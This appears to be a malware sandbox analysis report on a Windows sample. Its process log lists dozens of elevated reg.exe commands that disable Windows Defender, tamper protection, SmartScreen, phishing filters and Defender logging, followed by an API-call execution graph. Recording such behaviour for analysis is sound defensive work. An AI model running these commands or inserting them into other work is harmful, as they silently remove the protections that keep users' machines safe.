                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:01:12:04
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:01:12:05
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
                                      Imagebase:0x7ff7699e0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:01:12:06
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:18.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:16.4%
                                        Total number of Nodes:1339
                                        Total number of Limit Nodes:25
                                        execution_graph 3605 404f43 GetDlgItem GetDlgItem 3606 404f95 7 API calls 3605->3606 3614 4051ba 3605->3614 3607 40503c DeleteObject 3606->3607 3608 40502f SendMessageW 3606->3608 3609 405045 3607->3609 3608->3607 3610 40507c 3609->3610 3615 406594 21 API calls 3609->3615 3657 4044d6 3610->3657 3611 40529c 3613 405348 3611->3613 3618 4051ad 3611->3618 3624 4052f5 SendMessageW 3611->3624 3619 405352 SendMessageW 3613->3619 3620 40535a 3613->3620 3614->3611 3639 405229 3614->3639 3662 404e91 SendMessageW 3614->3662 3616 40505e SendMessageW SendMessageW 3615->3616 3616->3609 3617 405090 3623 4044d6 22 API calls 3617->3623 3679 40453d 3618->3679 3619->3620 3627 405373 3620->3627 3628 40536c ImageList_Destroy 3620->3628 3635 405383 3620->3635 3640 4050a1 3623->3640 3624->3618 3630 40530a SendMessageW 3624->3630 3625 40528e SendMessageW 3625->3611 3631 40537c GlobalFree 3627->3631 3627->3635 3628->3627 3629 4054fd 3629->3618 3636 40550f ShowWindow GetDlgItem ShowWindow 3629->3636 3633 40531d 3630->3633 3631->3635 3632 40517c GetWindowLongW SetWindowLongW 3634 405195 3632->3634 3644 40532e SendMessageW 3633->3644 3637 4051b2 3634->3637 3638 40519a ShowWindow 3634->3638 3635->3629 3652 4053be 3635->3652 3667 404f11 3635->3667 3636->3618 3661 40450b SendMessageW 3637->3661 3660 40450b SendMessageW 3638->3660 3639->3611 3639->3625 3640->3632 3643 4050f4 SendMessageW 3640->3643 3645 405177 3640->3645 3646 405132 SendMessageW 3640->3646 3647 405146 SendMessageW 3640->3647 3643->3640 3644->3613 3645->3632 3645->3634 3646->3640 3647->3640 3649 4054c8 3650 4054d3 InvalidateRect 3649->3650 3654 4054df 3649->3654 3650->3654 3651 4053ec SendMessageW 3653 405402 3651->3653 3652->3651 3652->3653 3653->3649 3655 405476 SendMessageW SendMessageW 3653->3655 3654->3629 3676 404e4c 3654->3676 3655->3653 3658 406594 21 API calls 3657->3658 3659 4044e1 SetDlgItemTextW 3658->3659 3659->3617 3660->3618 3661->3614 3663 404ef0 SendMessageW 3662->3663 3664 404eb4 GetMessagePos ScreenToClient SendMessageW 3662->3664 3665 404ee8 3663->3665 3664->3665 3666 404eed 3664->3666 3665->3639 3666->3663 3693 406557 lstrcpynW 3667->3693 3669 404f24 3694 40649e wsprintfW 3669->3694 3671 404f2e 3672 40140b 2 API calls 3671->3672 3673 404f37 3672->3673 3695 406557 lstrcpynW 3673->3695 3675 404f3e 3675->3652 3696 404d83 3676->3696 3678 404e61 3678->3629 3680 404555 GetWindowLongW 3679->3680 3690 404600 3679->3690 3681 40456a 3680->3681 3680->3690 3682 404597 GetSysColor 3681->3682 3683 40459a 3681->3683 3681->3690 3682->3683 3684 4045a0 SetTextColor 3683->3684 3685 4045aa SetBkMode 3683->3685 3684->3685 3686 4045c2 GetSysColor 3685->3686 3687 4045c8 3685->3687 3686->3687 3688 4045d9 3687->3688 3689 4045cf SetBkColor 3687->3689 3688->3690 3691 4045f3 CreateBrushIndirect 3688->3691 3692 4045ec DeleteObject 3688->3692 3689->3688 3691->3690 3692->3691 3693->3669 3694->3671 3695->3675 3697 404d9c 3696->3697 3698 406594 21 API calls 3697->3698 3699 404e00 3698->3699 3700 406594 21 API calls 3699->3700 3701 404e0b 3700->3701 3702 406594 21 API calls 3701->3702 3703 404e21 lstrlenW wsprintfW SetDlgItemTextW 3702->3703 3703->3678 3704 402643 3705 402672 3704->3705 3706 402657 3704->3706 3708 4026a2 3705->3708 3709 402677 3705->3709 3707 402d89 21 API calls 3706->3707 3718 40265e 3707->3718 3711 402dab 21 API calls 3708->3711 3710 402dab 21 API calls 3709->3710 3712 40267e 3710->3712 3713 4026a9 lstrlenW 3711->3713 3721 406579 WideCharToMultiByte 3712->3721 3713->3718 3715 402692 lstrlenA 3715->3718 3716 4026d6 3717 4026ec 3716->3717 3719 4060f9 WriteFile 3716->3719 3718->3716 3718->3717 3722 406128 SetFilePointer 3718->3722 3719->3717 3721->3715 3723 406144 3722->3723 3724 40615c 3722->3724 3725 4060ca ReadFile 3723->3725 3724->3716 3726 406150 3725->3726 3726->3724 3727 406165 SetFilePointer 3726->3727 3728 40618d SetFilePointer 3726->3728 3727->3728 3729 406170 3727->3729 3728->3724 3730 4060f9 WriteFile 3729->3730 3730->3724 3495 4015c6 3496 402dab 21 API calls 3495->3496 3497 4015cd 3496->3497 3498 405ed1 4 API calls 3497->3498 3513 4015d6 3498->3513 3499 401636 3501 401668 3499->3501 3502 40163b 3499->3502 3500 405e53 CharNextW 3500->3513 3504 401423 28 API calls 3501->3504 3514 401423 3502->3514 3510 401660 3504->3510 3506 405b05 2 API calls 3506->3513 3508 405b22 5 API calls 3508->3513 3509 40164f SetCurrentDirectoryW 3509->3510 3511 40161c GetFileAttributesW 3511->3513 3512 405aab 2 API calls 3512->3513 3513->3499 3513->3500 3513->3506 3513->3508 3513->3511 3513->3512 3515 4055dc 28 API calls 3514->3515 3516 401431 3515->3516 3517 406557 lstrcpynW 3516->3517 3517->3509 3731 404646 lstrlenW 3732 404665 3731->3732 3733 404667 WideCharToMultiByte 3731->3733 3732->3733 3734 4049c7 3735 4049f3 3734->3735 3736 404a04 3734->3736 3795 405b9b GetDlgItemTextW 3735->3795 3738 404a10 GetDlgItem 3736->3738 3739 404a6f 3736->3739 3742 404a24 3738->3742 3740 404b53 3739->3740 3748 406594 21 API calls 3739->3748 3793 404d02 3739->3793 3740->3793 3797 405b9b GetDlgItemTextW 3740->3797 3741 4049fe 3743 406805 5 API calls 3741->3743 3744 404a38 SetWindowTextW 3742->3744 3746 405ed1 4 API calls 3742->3746 3743->3736 3747 4044d6 22 API calls 3744->3747 3752 404a2e 3746->3752 3753 404a54 3747->3753 3754 404ae3 SHBrowseForFolderW 3748->3754 3749 404b83 3755 405f2e 18 API calls 3749->3755 3750 40453d 8 API calls 3751 404d16 3750->3751 3752->3744 3759 405e26 3 API calls 3752->3759 3756 4044d6 22 API calls 3753->3756 3754->3740 3757 404afb CoTaskMemFree 3754->3757 3758 404b89 3755->3758 3760 404a62 3756->3760 3761 405e26 3 API calls 3757->3761 3798 406557 lstrcpynW 3758->3798 3759->3744 3796 40450b SendMessageW 3760->3796 3768 404b08 3761->3768 3764 404a68 3767 40694b 5 API calls 3764->3767 3765 404b3f SetDlgItemTextW 3765->3740 3766 404ba0 3769 40694b 5 API calls 3766->3769 3767->3739 3768->3765 3770 406594 21 API calls 3768->3770 3776 404ba7 3769->3776 3771 404b27 lstrcmpiW 3770->3771 3771->3765 3774 404b38 lstrcatW 3771->3774 3772 404be8 3799 406557 lstrcpynW 3772->3799 3774->3765 3775 404bef 3777 405ed1 4 API calls 3775->3777 3776->3772 3780 405e72 2 API calls 3776->3780 3782 404c40 3776->3782 3778 404bf5 GetDiskFreeSpaceW 3777->3778 3781 404c19 MulDiv 3778->3781 3778->3782 3780->3776 3781->3782 3783 404cb1 3782->3783 3785 404e4c 24 API calls 3782->3785 3784 404cd4 3783->3784 3786 40140b 2 API calls 3783->3786 3800 4044f8 EnableWindow 3784->3800 3787 404c9e 3785->3787 3786->3784 3789 404cb3 SetDlgItemTextW 3787->3789 3790 404ca3 3787->3790 3789->3783 3792 404d83 24 API calls 3790->3792 3791 404cf0 3791->3793 3801 404920 3791->3801 3792->3783 3793->3750 3795->3741 3796->3764 3797->3749 3798->3766 3799->3775 3800->3791 3802 404933 SendMessageW 3801->3802 3803 40492e 3801->3803 3802->3793 3803->3802 3804 401c48 3805 402d89 21 API calls 3804->3805 3806 401c4f 3805->3806 3807 402d89 21 API calls 3806->3807 3808 401c5c 3807->3808 3809 401c71 3808->3809 3810 402dab 21 API calls 3808->3810 3811 402dab 21 API calls 3809->3811 3815 401c81 3809->3815 3810->3809 3811->3815 3812 401cd8 3814 402dab 21 API calls 3812->3814 3813 401c8c 3816 402d89 21 API calls 3813->3816 3817 401cdd 3814->3817 3815->3812 3815->3813 3818 401c91 3816->3818 3819 402dab 21 API calls 3817->3819 3820 402d89 21 API calls 3818->3820 3822 401ce6 FindWindowExW 3819->3822 3821 401c9d 3820->3821 3823 401cc8 SendMessageW 3821->3823 3824 401caa SendMessageTimeoutW 3821->3824 3825 401d08 3822->3825 3823->3825 3824->3825 3826 4028c9 3827 4028cf 3826->3827 3828 4028d7 FindClose 3827->3828 3829 402c2f 3827->3829 3828->3829 3569 403b4f 3570 403b67 3569->3570 3571 403b59 CloseHandle 3569->3571 3576 403b94 3570->3576 3571->3570 3574 405c63 71 API calls 3575 403b78 3574->3575 3577 403ba2 3576->3577 3578 403ba7 FreeLibrary GlobalFree 3577->3578 3579 403b6c 3577->3579 3578->3578 3578->3579 3579->3574 3833 405550 3834 405560 3833->3834 3835 405574 3833->3835 3837 405566 3834->3837 3838 4055bd 3834->3838 3836 40557c IsWindowVisible 3835->3836 3844 405593 3835->3844 3836->3838 3840 405589 3836->3840 3839 404522 SendMessageW 3837->3839 3841 4055c2 CallWindowProcW 3838->3841 3842 405570 3839->3842 3843 404e91 5 API calls 3840->3843 3841->3842 3843->3844 3844->3841 3845 404f11 4 API calls 3844->3845 3845->3838 3846 4016d1 3847 402dab 21 API calls 3846->3847 3848 4016d7 GetFullPathNameW 3847->3848 3849 4016f1 3848->3849 3850 401713 3848->3850 3849->3850 3853 4068b4 2 API calls 3849->3853 3851 401728 GetShortPathNameW 3850->3851 3852 402c2f 3850->3852 3851->3852 3854 401703 3853->3854 3854->3850 3856 406557 lstrcpynW 3854->3856 3856->3850 3857 401e53 GetDC 3858 402d89 21 API calls 3857->3858 3859 401e65 GetDeviceCaps MulDiv ReleaseDC 3858->3859 3860 402d89 21 API calls 3859->3860 3861 401e96 3860->3861 3862 406594 21 API calls 3861->3862 3863 401ed3 CreateFontIndirectW 3862->3863 3864 40263d 3863->3864 3865 402955 3866 402dab 21 API calls 3865->3866 3867 402961 3866->3867 3868 402977 3867->3868 3869 402dab 21 API calls 3867->3869 3870 406022 2 API calls 3868->3870 3869->3868 3871 40297d 3870->3871 3893 406047 GetFileAttributesW CreateFileW 3871->3893 3873 40298a 3874 402a40 3873->3874 3877 4029a5 GlobalAlloc 3873->3877 3878 402a28 3873->3878 3875 402a47 DeleteFileW 3874->3875 3876 402a5a 3874->3876 3875->3876 3877->3878 3879 4029be 3877->3879 3880 4032b9 35 API calls 3878->3880 3894 4034ea SetFilePointer 3879->3894 3882 402a35 CloseHandle 3880->3882 3882->3874 3883 4029c4 3884 4034d4 ReadFile 3883->3884 3885 4029cd GlobalAlloc 3884->3885 3886 402a11 3885->3886 3887 4029dd 3885->3887 3889 4060f9 WriteFile 3886->3889 3888 4032b9 35 API calls 3887->3888 3891 4029ea 3888->3891 3890 402a1d GlobalFree 3889->3890 3890->3878 3892 402a08 GlobalFree 3891->3892 3892->3886 3893->3873 3894->3883 3895 403fd7 3896 404150 3895->3896 3897 403fef 3895->3897 3899 404161 GetDlgItem GetDlgItem 3896->3899 3916 4041a1 3896->3916 3897->3896 3898 403ffb 3897->3898 3900 404006 SetWindowPos 3898->3900 3901 404019 3898->3901 3902 4044d6 22 API calls 3899->3902 3900->3901 3905 404022 ShowWindow 3901->3905 3906 404064 3901->3906 3907 40418b SetClassLongW 3902->3907 3903 4041fb 3904 404522 SendMessageW 3903->3904 3909 40414b 3903->3909 3934 40420d 3904->3934 3910 404042 GetWindowLongW 3905->3910 3911 40410e 3905->3911 3912 404083 3906->3912 3913 40406c DestroyWindow 3906->3913 3914 40140b 2 API calls 3907->3914 3908 401389 2 API calls 3919 4041d3 3908->3919 3910->3911 3921 40405b ShowWindow 3910->3921 3920 40453d 8 API calls 3911->3920 3917 404088 SetWindowLongW 3912->3917 3918 404099 3912->3918 3915 40445f 3913->3915 3914->3916 3915->3909 3928 404490 ShowWindow 3915->3928 3916->3903 3916->3908 3917->3909 3918->3911 3922 4040a5 GetDlgItem 3918->3922 3919->3903 3923 4041d7 SendMessageW 3919->3923 3920->3909 3921->3906 3926 4040d3 3922->3926 3927 4040b6 SendMessageW IsWindowEnabled 3922->3927 3923->3909 3924 40140b 2 API calls 3924->3934 3925 404461 DestroyWindow EndDialog 3925->3915 3930 4040e0 3926->3930 3932 404127 SendMessageW 3926->3932 3933 4040f3 3926->3933 3940 4040d8 3926->3940 3927->3909 3927->3926 3928->3909 3929 406594 21 API calls 3929->3934 3930->3932 3930->3940 3932->3911 3935 404110 3933->3935 3936 4040fb 3933->3936 3934->3909 3934->3924 3934->3925 3934->3929 3937 4044d6 22 API calls 3934->3937 3941 4044d6 22 API calls 3934->3941 3957 4043a1 DestroyWindow 3934->3957 3938 40140b 2 API calls 3935->3938 3939 40140b 2 API calls 3936->3939 3937->3934 3938->3940 3939->3940 3940->3911 3966 4044af 3940->3966 3942 404288 GetDlgItem 3941->3942 3943 4042a5 ShowWindow EnableWindow 3942->3943 3944 40429d 3942->3944 3969 4044f8 EnableWindow 3943->3969 3944->3943 3946 4042cf EnableWindow 3951 4042e3 3946->3951 3947 4042e8 GetSystemMenu EnableMenuItem SendMessageW 